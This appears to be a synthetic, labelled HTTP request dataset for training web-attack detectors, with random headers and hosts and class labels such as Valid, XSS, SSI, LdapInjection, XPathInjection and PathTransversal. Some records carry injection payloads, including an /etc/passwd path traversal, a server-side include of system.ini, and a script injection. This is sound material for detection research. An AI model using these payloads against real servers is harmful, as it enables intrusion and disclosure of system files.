UA-Pixels: 0211x5802
Via: HTTP/7.8 53.70.124.38, 4.4 www.ageOa.jpg, FTP/0.2 179.12.71.150
Transfer-Encoding: identity
Upgrade: tam/3.6, anw/0.4, FdeWt/4.3, nstqe/3.4
Warning: 072 www.cUEomj7n.html:46118 "aodn" "Sun, 21 Jun 09 18:25:54 CET"
X-Forwarded-For: 108.88.117.150
X-Serial-Number: 2106773576
----: --------------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26195
Start - Id: 8873
class: Valid
GET /ga.5OV52/oT-4Kv/ibsrNo/lGPgnI_kjlulJB9xuM./nr8lkuaief.mdb? HTTP/1.0
Host: www.oa1id.it
Connection: close
Accept: */*
Accept-Charset: *;q=0.3
Accept-Encoding: *;q=0.4
Accept-Language: g8-Seo;q=0.5
Cache-Control: 4ni3h=oe
Client-ip: 132.87.118.161
Cookie: iahYdhD=Eh;tdw34cto=dt?5twf;rtinr=w ee>vhhphpbodyWce;abo=1GE1arY
Cookie2: $Version="980"
Date: Thu, 31 Aug 06 18:43:42 CET
ETag: W/"xpB9lcdUhtkgRzEnu83H"
Expect: 100-continue
From: iu0es@geoakos.de
If-Modified-Since: Sat, 04 Mar 06 23:11:23 GMT
If-Unmodified-Since: Sat, 22 Nov 08 06:03:35 CET
If-Match: "kk4vNS20zlhgHFmX8Y4"
If-None-Match: "FjFLAES@Vd693cux"
If-Range: "7_FGAChqEi2kYsdwzat"
Max-Forwards: 3904
MIME-Version: 8.5
Pragma: no-cache
Proxy-Authorization: Basic cmVoZHJzOmV5cjdpYUJt
Authorization: Basic czVQZzV1czo2ZXJBc3Q=
Range: 85-
Referer: /taoeIim/nE8shu/2hrEa.exe
TE: trailers
Trailer: If-Modified-Since
User-Agent: Mozilla/9.9 (Machintosh; U; PPC 0.2; ro-7d; rv:3.4.8) Gecko/10868364
UA-CPU: Sparc
UA-Disp: 909,1237,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 3568x0188
Via: HTTP/4.6 249.157.99.30, tzso1/3.3 78.86.47.77:25178, 2.1 www.hniH.jpeg
Transfer-Encoding: compress
Upgrade: rudtA/2.1, e5r/5.2, Ndas/0.8, iomgfE/7.8
Warning: 295 www.trrmnci.htm "lutuwiehtspuezbeode" 
X-Forwarded-For: 38.43.108.176
X-Serial-Number: 8434759512
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 8873
Start - Id: 13203
class: Valid
GET /KBRJHVN.jNL/r@z/tircZLT@Fa5B3anwhX5K/nrdtnrenGnoo/iyP9x/jautoaoihEasithg8se.mspx?ur1ns=86068359&weodj=+hwindow.open HTTP/1.0
Host: www.N5Am4Er.ch
Connection: close
Accept: audio/*
Accept-Charset: x-mac-greek, iso-10646-ucs-2;q=0.9, koi8-r, x-mac-cyrillic;q=0.1
Accept-Encoding: gzip;q=0.6, identity;q=0.7, gzip, gzip
Accept-Language: *
Cache-Control: o1c=xsnwieg6
Client-ip: 169.235.34.90
Cookie: wh9teas=nnRdropaimg
Cookie2: $Version="70"
Date: Sun, 11 Sep 05 23:00:20 CET
ETag: W/"YlmpUFhieXa1--E"
Expect: 100-continue
From: msa1sei@snhodn.biz
If-Modified-Since: Sun, 21 Jun 09 21:22:07 CET
If-Unmodified-Since: Tue, 13 Nov 07 10:14:05 GMT
If-Match: *
If-None-Match: *
If-Range: Sat, 26 May 07 18:23:02 UTC
Max-Forwards: 6575
MIME-Version: 7.8
Pragma: no-cache
Proxy-Authorization: Digest opaque="pa982h"
Authorization: jetiIw 2cslyn=tsixoft
Range: 781398-
Referer: /seioC.wav
TE: trailers
Trailer: Trailer
User-Agent: r@msoxu7G http://www.aenEht.fr
UA-CPU: x86
UA-Disp: 026,187,16
UA-OS: Win95
UA-Color: color16
UA-Pixels: 6667x346
Via: 8.7 www.8lekFtr.html, IfhiPH/1.9 170.71.76.236
Transfer-Encoding: identity
Upgrade: tsts/0.5, eao/0.4, t6o/4.1, 2ibk/6.8, ihsqE/6.1
Warning: 751 204.50.136.157 "wlaanseIllOcn4det8i" "Thu, 15 Oct 09 05:51:39 CET"
X-Forwarded-For: 250.149.217.157
X-Serial-Number: 2985337239117485
----: -------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 13203
Start - Id: 26943
class: Valid
GET /ese2nmnsflhtThsv/oC/ccav4p__vKajn8hJZ/l0e/biynSek/iyhTB/formNscript/Oq1CjPwexec_T/l4_RiFy21o/hfisepnonw/hD2eBDcOmpptuKUb/ad4bro7.js?tt=tehQ8d8TMy&ila9pttlr1efsr=ee6nabmratiocua HTTP/1.0
Host: www.snao3dameh.fr
Connection: close
Accept: video/*, application/x-tar;q=0.5
Accept-Charset: *;q=0.2
Accept-Encoding: deflate, identity;q=0.2, deflate, gzip;q=0.3, deflate;q=0.5
Accept-Language: eC95sx1T-aev, tatdm-arnirL, v-6Npcach;q=0.2, inomb-aseagEbl
Cache-Control: only-if-cached
Client-ip: 117.203.102.112
Cookie: 6ndneoognha6=9fs7etnx;es7i2noxhlE=sh3;jI-2=80
Cookie2: $Version="14"
Date: Mon, 06 Jul 09 05:01:16 CET
ETag: "vkbb5C28YoSK9@Bj"
Expect: 100-continue
From: naeolznc@aqswey.biz
If-Modified-Since: Tue, 27 Dec 05 18:05:34 GMT
If-Unmodified-Since: Thu, 23 Feb 06 02:03:48 GMT
If-Match: *
If-None-Match: "QOVoYoSN4M.V1h_YEJI"
If-Range: Fri, 11 Jul 08 21:06:30 GMT
Max-Forwards: 0050
MIME-Version: 8.7
Pragma: no-cache
Proxy-Authorization: Lsqh neinrtc=qqEEf
Authorization: NTLM OXBocnJvTnluYWNtdm5PQWlyNmVnZTFlZXI4Y2FoaGVuaXNFRQ==
Range: 909287-,-7
Referer: http://www.neitrb.gov/Isrkzvan/tytjh/ajrL/lSCica/httduyOi.cgi
TE: gzip
Trailer: If-Modified-Since
User-Agent: Mozilla/9.8 (X11; U; SunOS sun4u 5.8; ph-ti; rv:3.6.2) Gecko/88673052
UA-CPU: Sparc
UA-Disp: 967,053,32
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 863x0796
Via: FTP/0.7 www.d1EtOt.jpeg, 1.1 www.en9l.gif, HTTP/7.3 www.eesm9e.tiff
Transfer-Encoding: utls; veyal=tr9bP
Upgrade: 4dtel/9.0, ditos1/6.4, ruIehu/9.5, reatd/7.5
Warning: 561 www.wyno.js "aaajeaa" "Mon, 25 May 09 20:49:12 UTC"
X-Forwarded-For: 31.91.23.195
X-Serial-Number: 781010344531
----: --------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 26943
Start - Id: 31905
class: Valid
GET /pakperpioG/h5m7bK6A/exenhocureneeotalec/n8mHSuwD0nSLcPtpz/nv/9PHriframebf.swf?libEeYRqrvTG=aeh%3FseTincludeejym7o+&oztgvqeslo=73388141&Sphpm-Xaccess_logSA=60183 HTTP/1.1
Host: www.doxatotxns.cz
Connection: close
Accept: */*;q=0.9
Accept-Charset: iso-8859-2, x-mac-turkish;q=0.0, x-mac-chinesetrad, euc-tw;q=0.7
Accept-Encoding: compress
Accept-Language: Od-boins, 9oiQ-edmah2, 8ecsy-raa;q=0.3, eyo-y;q=0.5
Cache-Control: yO6tnukn='nmoina'
Client-ip: 48.40.19.225
Cookie: t4IteentHeSa=07951;LljeeeLlN=gWemmi4vjn;cesdeNs9l=eet3Oarp;itn7mesiemp=Yf
Cookie2: $Version="6"
Date: Tue, 29 Jan 08 15:37:10 CET
ETag: W/"SG5jVQyCNQRd8S."
Expect: rtZBu
From: haeoa@filcnbidra.net
If-Modified-Since: Mon, 16 Apr 07 16:29:12 GMT
If-Unmodified-Since: Sat, 24 Jul 04 16:18:16 UTC
If-Match: "KyQXLwyBkzV3xoWJpJi9"
If-None-Match: *
If-Range: *
Max-Forwards: 2
MIME-Version: 5.7
Pragma: no-cache
Proxy-Authorization: Digest algorithm=Eaeos
Authorization: rabe eeyh=ontLt
Range: 581-,06-0,27-
Referer: /hs2B/cht6/nT6T.gz
TE: deflate,chunked;q=0.3,chunked
Trailer: Expect
User-Agent: Mozilla/7.2 (Machintosh; U; PPC Mac OS X 9.1; ot-io; rv:1.4.0) Gecko/08645341
UA-CPU: MIPS
UA-Disp: 280,3333,16
UA-OS: Windows 98
UA-Color: color32
UA-Pixels: 049x223
Via: 3.1 www.igmder.html
Transfer-Encoding: gzip
Upgrade: oas/9.5, aueoSs/1.5, stovTn/6.0, e0ra/0.3
Warning: 730 www.0tacu.shtml:2 "asbsh" "Fri, 27 Jan 06 13:54:38 CET"
X-Forwarded-For: 163.91.80.203
X-Serial-Number: 643504609
----: ----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 31905
Start - Id: 33824
class: Valid
PUT /mRvX8gPz@/iTXh6sD4O/pNPLAO.7.tiff? HTTP/1.0
Content-Length: 13
Content-Language: ti8,tor
Content-Encoding: gzip
Content-Location: /jtto.txt
Content-MD5: VWVhZ2dZaWVuZW9zYW1xbg==
Content-Type: application/x-www-form-urlencoded
Expires: Sun, 22 Nov 09 09:48:54 CET
Last-Modified: Sun, 20 Jul 08 06:06:45 GMT
Host: 73.75.200.120
Connection: ankf
Accept: */*
Accept-Charset: *;q=0.2
Accept-Encoding: 
Accept-Language: *
Cache-Control: min-fresh=84
Client-ip: 223.99.49.208
Cookie: luptewn=httpuiwklho;he=7;h@Ki=esnnkHtontaaz;pto1=247986;B67WZNcCbj=47
Cookie2: $Version="01"
Date: Tue, 21 Feb 06 01:26:32 GMT
ETag: "JnBiDwpYD6NoaHoF6p"
Expect: aomrhag3
From: dmRxngT@spiuhlni.ch
If-Modified-Since: Sat, 27 Aug 05 20:29:04 UTC
If-Unmodified-Since: Sun, 17 Dec 06 14:13:11 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 5
MIME-Version: 3.7
Pragma: no-cache
Proxy-Authorization: ejhe lie9d=RBzy
Authorization: Digest opaque="tskioSt7"
Range: 54-,81-
Referer: http://efAsetn.st/2rmf3xde/ehey4/pDr4ajgp/lsibik/tohpA67.pl
TE: deflate,gzip;q=0.4,deflate
Trailer: Upgrade
User-Agent: eyyaDf http://www.Nyneo8.fr
UA-CPU: Sparc
UA-Disp: 2081,476,8
UA-OS: Win95
UA-Color: color8
UA-Pixels: 301x2853
Via: 9.6 177.188.135.79:40, 9.5 www.pO4gl.png, FTP/4.3 www.esa0.jpg
Transfer-Encoding: gzip
Upgrade: ncln/7.1
Warning: 284 www.oftu.gif "feaaeesdct7" 
X-Forwarded-For: 54.10.214.243
X-Serial-Number: 0148063102
----: ----------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

g2gs=oe>eoi

End - Id: 33824
Start - Id: 40405
class: SSI
PUT /@3NSSvlikeOS/n@z_82.yc4CZX/a-gTnyyZ1oJK/wrshiHnojgsS/5lFG.DmOPMPLwZu.wB/oratret7reg1dp.html? HTTP/1.0
Content-Length: 318
Content-Language: qrsbla
Content-Encoding: identity
Content-Location: /uheeoeY/thqehnp/rylsE/vrlpt.tiff
Content-MD5: bWRhdGVoYnRPaGV0aWFmdA==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 07 Dec 07 13:23:27 UTC
Last-Modified: Thu, 27 May 04 02:29:59 UTC
Host: 209.95.50.254
Connection: rrl72wv
Accept: text/*;q=0.5, text/html, audio/basic;q=0.3
Accept-Charset: windows-1252;q=0.0, ks_c_5601-1987;q=0.2, big5;q=0.9, windows-1257;q=0.7
Accept-Encoding: 
Accept-Language: *;q=0.1
Cache-Control: max-age=824
Client-ip: 16.69.2.56
Cookie: ee0eIm=rbAiieeatelnet'l|bl
Cookie2: $Version="13"
Date: Sun, 29 Jun 08 09:42:12 UTC
ETag: "6VoYCsLVuGsywbSj0"
Expect: ehahe
From: nvecwD@airnsvo7rs.com
If-Modified-Since: Sat, 17 May 08 01:15:41 CET
If-Unmodified-Since: Tue, 25 Apr 06 14:42:43 CET
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 268
MIME-Version: 9.4
Pragma: no-cache
Proxy-Authorization: l4te9v tifnO=sIwmcnTg
Authorization: UaneH hnznx=yoh6
Referer: http://www.ia1itj.be/eMrfe8nE.asmx
TE: deflate,trailers,chunked
Trailer: If-Unmodified-Since
User-Agent: zpnd2sosgreiwdm
UA-CPU: Sparc
UA-Pixels: 5480x145
Via: 8.8 www.w7ycngun.png, 0.8 55.132.48.251, 2.5 www.tasAa9.html
Transfer-Encoding: compress
Upgrade: ereyo/1.5
Warning: 410 www.hett9f.tiff "rlxshbn4vdigo" 
X-Forwarded-For: 55.196.49.158
X-Serial-Number: 945253
----: -----------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

cLh= 0a7ri&Feoeo7gz=gie&ytypanstdio=rca&Lh0=ow&zuEa4=<!--    #include     virtual="c:\winnt\system.ini"   -->&tnesslcebaA=in&netcatvservicesf@AbJv=hwcbuolmGan&D0atdVJGsboot.iniZj=lt?telnete&yfqEwuwem=0325&bbwsMhgec=9180&wo=417&w7xmlexDJdl=Bcui9t&n1jh=szOPH_uhq7.I&fgse=1734&cssattetTneEt=do8velho

End - Id: 40405
Start - Id: 7537
class: Valid
PUT /rw5uH/mBChugC4JArb/linu/kAuOmgmbmsbQqJYaZN/ohrwcnazo7/rmXPnw8mtcc/i6sf.rJ0rIZ@moRy/nxkeHY7IzhWwZeEs/a17eufcks.bin? HTTP/1.0
Content-Length: 88
Content-Language: puldrasg,dtt
Content-Encoding: deflate
Content-Location: /misp/j7rn/eosnSl.sh
Content-MD5: ZXBBc2h4QWw0ZHR3ZzJpbg==
Content-Type: application/x-www-form-urlencoded
Expires: Fri, 30 Oct 09 12:31:42 CET
Last-Modified: Sat, 31 Mar 07 23:38:43 UTC
Host: www.eIniT5d5h.be
Connection: keep-alive
Accept: video/quicktime, application/*
Accept-Charset: *;q=0.7
Accept-Encoding: 
Accept-Language: maeeeit-tde, o-eertdsex;q=0.9, O-UhsEaj;q=0.9, taOAg-Q;q=0.0, cn-yR8u0ul
Cache-Control: only-if-cached
Client-ip: 175.161.119.11
Cookie: VII_VkZ.vUa=1538507;slyhnaad=connectio9lhse3ci6tea;NWiso928sx2knr=htpassl883WeyTF> t;tgozTx7ssteco=578512;orenbu=xOHG;binclude2I=ee
Cookie2: $Version="208"
Date: Sun, 25 Jul 04 12:19:17 CET
ETag: "Gkl0tmFfoOusxWAOw"
Expect: Apt3G=woubl;kwsrg=oguten
From: tedca@tnDTs3lE.org
If-Modified-Since: Mon, 08 Mar 10 17:13:05 GMT
If-Unmodified-Since: Sun, 25 Nov 07 17:19:18 UTC
If-Match: *
If-None-Match: "3kxSgUN5GwURvvZAxa"
If-Range: *
Max-Forwards: 27
MIME-Version: 1.0
Pragma: no-cache
Proxy-Authorization: Basic c2lmczpodWhyZQ==
Authorization: NTLM NGRtcHNhbmVkaWlvSXhldmMxY290aWlTc2RmdWhkcmZ0aGxzbG9v
Range: 31105-
Referer: http://sAS8vro.it/nlutmae/jh3njd3/rreo/ktRipq.sh
TE: trailers,trailers,chunked;q=0.6
Trailer: Via
User-Agent: rhjiDaqyimN
UA-CPU: x86
UA-Disp: 8435,1661,8
UA-OS: Linux
UA-Color: color8
UA-Pixels: 607x1532
Via: 6.6 127.130.33.229, nnpve/6.9 185.224.152.189
Transfer-Encoding: deflate
Upgrade: snu/9.1, l0m/9.5, rlnstR/7.1
Warning: 213 www.eoskA.jpeg "y0tdoaExi3ntiraf0N7n" 
X-Forwarded-For: 191.61.229.46
X-Serial-Number: 38021962558581
----: -------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

na=ee&do=9177769&_Kklplog=hi76Ipfoft0e&te9h=Tt u9p&iehpsyttnsoucoc=0&wshH66Pe=5999278091

End - Id: 7537
Start - Id: 48025
class: XSS
GET /igrl5rveaeeiqsahepn/qoqnwiQeenigeEec/hewa3/fw6xDBSehvXSK.js?Ns0oa5dntn=t8SjjYAa&erVm4Kdropzc=s&f0=%26%3Cscript+++%3E%5Balert++%28%27lmoh%27%29%3B%5D%3C%2Fscript+%3E&Senutnos=3234&NY=6914&1tb=wroae&ebnySlpoPc5oymn=hht HTTP/1.0
Host: 169.77.43.181
Connection: 7twseb
Accept: application/x-tar, application/*
Accept-Charset: x-mac-greek, shift_jis, windows-1255;q=0.9, iso-8859-9;q=0.1
Accept-Encoding: *;q=0.8
Accept-Language: *
Cache-Control: no-store
Client-ip: 8.30.164.22
Cookie: jaft8CexrLibt=2770492
Cookie2: $Version="114"
Date: Wed, 01 Sep 04 23:29:52 GMT
ETag: "GJ8gcU4@LIDaCNFpkX9Z"
Expect: 0er3ncru
From: uesois@ewrsoxtt.it
If-Modified-Since: Sat, 13 Oct 07 06:38:52 UTC
If-Unmodified-Since: Fri, 18 Sep 09 24:27:24 UTC
If-Match: "Jvxa84xpJB0RRn0uYkL5"
If-None-Match: "9@Ot16SETGz0f-d1rm"
If-Range: *
Max-Forwards: 2
MIME-Version: 4.1
Pragma: no-cache
Proxy-Authorization: umrl cmws=Yzunt
Authorization: NTLM bG9lZWRlTDJlaHJ0bm1hclRTbnRtaWdzb3Z0SWl5V2VtNXQ=
Range: 3837-2
Referer: /Onheos/niaaeo/urHus/eo5R0l/nauala.pl
TE: gzip;q=0.3
Trailer: Accept-Charset
User-Agent: itHjtkwenpn
UA-CPU: PowerPC
UA-Disp: 212,5646,16
UA-OS: Windows NT
UA-Color: color32
UA-Pixels: 0874x138
Via: HTTP/3.5 www.czeacsu0.css, 4.9 www.hc6ot.js:9007
Transfer-Encoding: gzip
Upgrade: odv/3.8, cye8/8.2
Warning: 409 www.nwho7d.jpeg "t6otamehitht" "Sat, 04 Sep 04 24:22:06 CET"
X-Forwarded-For: 177.208.72.84
X-Serial-Number: 698729021
----: ----------------------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 48025
Start - Id: 38067
class: LdapInjection
GET /aat4j.dp/sahiciekmeagFsmeA/fr/sazfZ-rTP5TpJmFVmiK/eGbaXq/irmhmti3ywto/em@_i_ff/8m/oesiilPa/yJ1pD44rs5ZW1uTqBJ/25n4etgzrFgt9gsi/Oo8tXWouhtpass.exe?lcs3yugtgQyw=15&souiuseem=Yhemdl6slet9BbLIL&wEjumJKUzrQe=x8%29%28+%7C++%28tsehi%3D*%29&jjI7Ci5_https=JYI8gea7rmhicog&tXyfecP2tdxdre=966135599&-Z@@t=79763866&hkanAfb=nh&8rohzh=l&fxhftpnthhsuH=eEn5Ijbbtof&heD=Asoo0a&isnlgm2ifsErrrr=941&rno1dteeuhiaq=2713354292 HTTP/1.1
Host: 95.250.139.14:80
Connection: iet2dgm
Accept: */*
Accept-Charset: *
Accept-Encoding: compress, compress;q=0.6, compress;q=0.1, compress;q=0.1
Accept-Language: si-no5bauin, ipetw-tp, ease-ze;q=0.3, 1aCiwE-altehce;q=0.5, bvsfttnt-lhpi5su
Cache-Control: no-store
Client-ip: 163.227.108.150
Cookie: otd=85266864;omdh=80;62iecs=ept1by6_y-v;mtbwi=mtum;wfiEov94ig8peka=o4e%~  yvn tbin
Cookie2: $Version="57"
Date: Mon, 24 Nov 08 18:48:29 CET
ETag: W/"aqQyLq-Rgqc2QXcXU"
Expect: 100-continue
From: klienot@sqnSctf.com
If-Modified-Since: Mon, 04 Jun 07 24:52:15 UTC
If-Unmodified-Since: Sun, 14 Mar 04 19:05:37 GMT
If-Match: "@oljCu3qkH0hw6Qysqn-"
If-None-Match: *
If-Range: "ybjZ0m.eRiS9k@AG"
Max-Forwards: 6
MIME-Version: 7.3
Pragma: no-cache
Proxy-Authorization: NTLM ZWNnaGFuZm8xbXI0dGhlbnl3dGg5cnNhZThyaTZjZW5hcnNFYXJjVGRl
Authorization: Digest username="tezr"
Range: 77-,76-
Referer: /feieh/Hsri.php4
TE: chunked,deflate;q=0.5
Trailer: Accept
User-Agent: Mozilla/2.1 (Machintosh; U; PPC 3.0; tl-to; rv:5.8.1) Gecko/74899208
UA-CPU: Sparc
UA-Disp: 119,1491,16
UA-OS: Win9x
UA-Color: color16
UA-Pixels: 5823x093
Via: FTP/4.4 www.teeLOto.js, 9.4 www.wdr1Nae.shtml
Transfer-Encoding: deflate
Upgrade: he4tl/7.5, euo/6.5, etH/9.6, aci/2.2, oojhe/4.2
Warning: 305 www.fimtrem.htm "cLexd43gdbuw" 
X-Forwarded-For: 84.58.38.49
X-Serial-Number: 814494240740
----: --------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 38067
Start - Id: 49002
class: XPathInjection
GET /dAnf77nVpJ/iQ/c-Fb@BMVWdgrvLbpV2i/se.js?9ttutrlsz=1925436&ttEhk=dlr%27+++++or+++++Ea9%2FotT%2Fchild%3A%3Anode%28%29%5Bprocessing-instruction%28%29%3D6%5D++++or+%27aimte%27%3D++%27&aitioiso1yya=iy&ph=heeSrT&Tltlsgntiear=nrew+f&@PSSJNJ983p=3 HTTP/1.1
Host: 111.9.235.152:80
Connection: eni7a
Accept: image/png, text/*;q=0.7, image/*;q=0.0
Accept-Charset: windows-1252;q=0.2, iso-8859-15
Accept-Encoding: 
Accept-Language: sinet-E, oEtfs-p
Cache-Control: max-stale
Client-ip: 65.168.75.165
Cookie: tn=ee;eodlco=dogGsOqv
Cookie2: $Version="6"
Date: Sat, 26 Nov 05 03:27:55 GMT
ETag: W/"_rZhm0NzLc2Mi18y-yg"
Expect: 100-continue
From: w6wr@nytn.it
If-Modified-Since: Sat, 11 Aug 07 17:48:17 GMT
If-Unmodified-Since: Sat, 26 Jun 04 11:12:28 UTC
If-Match: *
If-None-Match: *
If-Range: "Nkl_1cQDSzNpyd8aNW"
Max-Forwards: 186
MIME-Version: 9.9
Pragma: no-cache
Proxy-Authorization: Digest nc=2FF0fE2f
Authorization: Basic aW5vZWk6aXR5ZWxpdA==
Range: -520,420265-,87-062067
Referer: http://www.dssxT.uk/l1is4/dtmctsae/n9ozamdv/mll4e.tar.gz
TE: deflate,chunked
Trailer: Range
User-Agent: MsLwih4ceOhrehra
UA-CPU: 68000
UA-Disp: 638,801,8
UA-OS: Linux
UA-Color: color32
UA-Pixels: 4233x4601
Via: 2.4 197.55.30.48
Transfer-Encoding: gzip
Upgrade: aciIr/5.8, i4yc/6.1, 4tur/3.8
Warning: 893 www.orci.jpg "9g1en4itrrimothb4" 
X-Forwarded-For: 235.34.139.147
X-Serial-Number: 544350626543951868
----: ---------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 49002
Start - Id: 46324
class: PathTransversal
GET /eUlvq97KBGXmz@./JQROBhavingOeaccess_logmetaboot.ini/dFK5i3b/e3r4rUo7ootbo/rP2nJKperla6xp_x/0PMoLgty0dEO.png?2-iAZKZ-y=230495&beb8n0teman=556165208&fksf3lQctluF4e4=674&n7hea0h=fRetj-Thnl-la&odomwtIJ6=xwe&tfch=wBcM&njC5sY1O@z=pu5T6%40p&tuwOn5petrmnuf=%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2F%5C.%5C.%5C%2Fetc%5C%2Fpasswd%2500.html&rgfq0ifiewee0kh=73621571&tt=7755&AtrkpnSlph=nmail&sJdmsoEt=iq&cue=3 HTTP/1.0
Host: www.ihi0.ch
Connection: keep-alive
Accept: image/*, video/mpeg, text/*
Accept-Charset: iso-8859-9, gb2312;q=0.8
Accept-Encoding: identity, compress, gzip, identity, deflate;q=0.3
Accept-Language: a8RasfNl-4d, n4-ne;q=0.4, ioeyu-efer, mnk2lC-ohei;q=0.3, Hc-neoyo;q=0.8
Cache-Control: min-fresh=1484
Client-ip: 146.96.8.202
Cookie: stxe0wparir=97
Cookie2: $Version="67"
Date: Sat, 20 Aug 05 23:52:57 GMT
ETag: "csbZDEq4M4._0-0s2jK"
Expect: 100-continue
From: sgtDwB@5isge.ch
If-Modified-Since: Sat, 30 Apr 05 17:27:34 GMT
If-Unmodified-Since: Fri, 13 Jul 07 21:15:53 GMT
If-Match: "1swgFq-Ny_tsuC94bX"
If-None-Match: *
If-Range: *
Max-Forwards: 957
MIME-Version: 6.3
Pragma: 8e='b'
Proxy-Authorization: Digest nc=54AeEe7f
Authorization: Digest nonce
Range: 595-7160,98-,4-961
Referer: http://www.nfesC.st/iuri/prxq8r/ethas1si/enkysei.dll
TE: trailers,trailers,trailers
Trailer: Via
User-Agent: qno9 (t5oC5tBO; vq-ljQe; b7XQfu78s)
UA-CPU: Sparc
UA-Disp: 776,0792,32
UA-OS: WinNT
UA-Color: color16
UA-Pixels: 434x579
Via: 6.5 www.srzph.htm
Transfer-Encoding: compress
Upgrade: Dnh/3.3, iienNa/1.0, khpjt/2.7, ote6v4/0.0
Warning: 494 178.239.117.244 "Abhgtrgfsota" "Tue, 21 Mar 06 06:42:46 CET"
X-Forwarded-For: 84.224.165.18
X-Serial-Number: 036028433584
----: -----------------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 46324
Start - Id: 2443
class: Valid
GET /eiWtn5Q@mhW1OPQ4PDIP.gif?Ho=tahflomaefro&oar=oz_RqYu&tXMj=roeoeedh6o&tbeadvegdlFc=oepsAz+uaaetbin+%7Eb HTTP/1.1
Host: 150.81.219.52
Connection: trasofo
Accept: image/png;q=0.1, image/*;q=0.6, video/*
Accept-Charset: iso-8859-9;q=0.9, iso-8859-7;q=0.8, euc-jp, x-mac-ce;q=0.6
Accept-Encoding: *
Accept-Language: ebo-yaLJll;q=0.5, rm-8cUwu2zn;q=0.2, ee-ti3lur;q=0.4, dr-ztbm5im;q=0.9
Cache-Control: adAt4yps=i75idaT
Client-ip: 17.92.203.155
Cookie: taoGsNnvfe=94014105;an=w&'ps(rcspe;4Sao=daktf
Cookie2: $Version="692"
Date: Sat, 30 Apr 05 09:06:13 GMT
ETag: W/"uxVimR45.qMcKbzLcPP3"
Expect: 8oacabCe
From: i6anwg@6eqonb.st
If-Modified-Since: Mon, 09 Nov 09 23:19:15 CET
If-Unmodified-Since: Tue, 20 Sep 05 14:12:45 GMT
If-Match: "gkMcErlSp2UA8-fRMgo"
If-None-Match: *
If-Range: *
Max-Forwards: 723
MIME-Version: 8.3
Pragma: ascueerw='45eddh'
Proxy-Authorization: ntaw7o tt7Lty8=1tmeaxs
Authorization: Digest realm
Range: 4069-,-41
Referer: /eRirds.png
TE: chunked;q=0.4
Trailer: Via
User-Agent: teU28O http://www.smesUop.com
UA-CPU: x86
UA-Disp: 012,6333,16
UA-OS: Mac OS X
UA-Color: color32
UA-Pixels: 750x609
Via: FTP/5.6 229.42.184.92, HTTP/8.5 114.178.100.206
Transfer-Encoding: 9nntr
Upgrade: eentc/2.6, mSansn/5.8, rrshto/6.6, NizNs/4.7
Warning: 861 www.bgseo.shtml "IrtAieAiic" 
X-Forwarded-For: 213.191.153.150
X-Serial-Number: 802306505768249437
----: -------------------------
~~~~~: ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

null

End - Id: 2443
Start - Id: 27123
class: Valid
GET /iOl8FJXEHjeAhMp/NtVno/ipermioosws/ggt21bon/iZV8K0xDv_ivE-5A14.css?l6ecet1Uh=dvlmk&U-hBtxx.Xaccess_logJk=75&T5Bnullg7eEkk=Tyog+o HTTP/1.1
Host: 52.239.136.168:2
Connection: tiTB
Accept: text/*
Accept-Charset: x-mac-hebrew, iso-2022-kr;q=0.6
Accept-Encoding: *
Accept-Language: *
Cache-Control: min-fresh=0
Client-ip: 33.122.90.124
Cookie: t9unteWenbu=ihs@k;eecdntllTs=ng;HnIl=tuxeaeiakcrlei
Cookie2: $Version="926"
Date: Tue, 08 Jun 04 05:58:05 CET
ETag: "cR@krZP4Fect@PPa6kM0"
Expect: 100-continue
From: autmrtph@gdspioa8s.it
If-Modified-Since: Fri, 10 Nov 06 06:00:37 GMT
If-Unmodified-Since: Thu, 18 Oct 07 07:35:21 GMT
If-Match: *
If-None-Match: *
If-Range: *
Max-Forwards: 788
MIME-Version: 4.2
Pragma: diudberh='moeee'
Proxy-Authorization: cDsd5 tanae3ex=Nmchr
Authorization: diom hfoioe=rrah
Range: 17545-664
Referer: http://www.758sre.org/gSsh/sgmec/Vyycl/t1ee.wav
TE: trailers
Trailer: Max-Forwards
User-Agent: ceLs/4.5.3.0.3
UA-CPU: Sparc
UA-Disp: 940,210,8
UA-OS: Windows 95
UA-Color: color32
UA-Pixels: 419x0757
Via: blHsn4/2.2 www.ipd9e.shtml, HTTP/3.5 192.18.7.40, 6.1 183.204.41.151
Transfer-Encoding: gzip
Upgrade: fntcu/3.4, wotta/7.7, aL8n/3.8
Warning: 804 www.hpqoryti.css "Thqahnetlrepeoynn" 
X-Forwarded-For: 229.229.25.15
X-Serial-Number: 0352610
----: -----------------------
~~~~~: ~~~~~~~~~~~~

null

End - Id: 27123
Start - Id: 23759
class: Valid
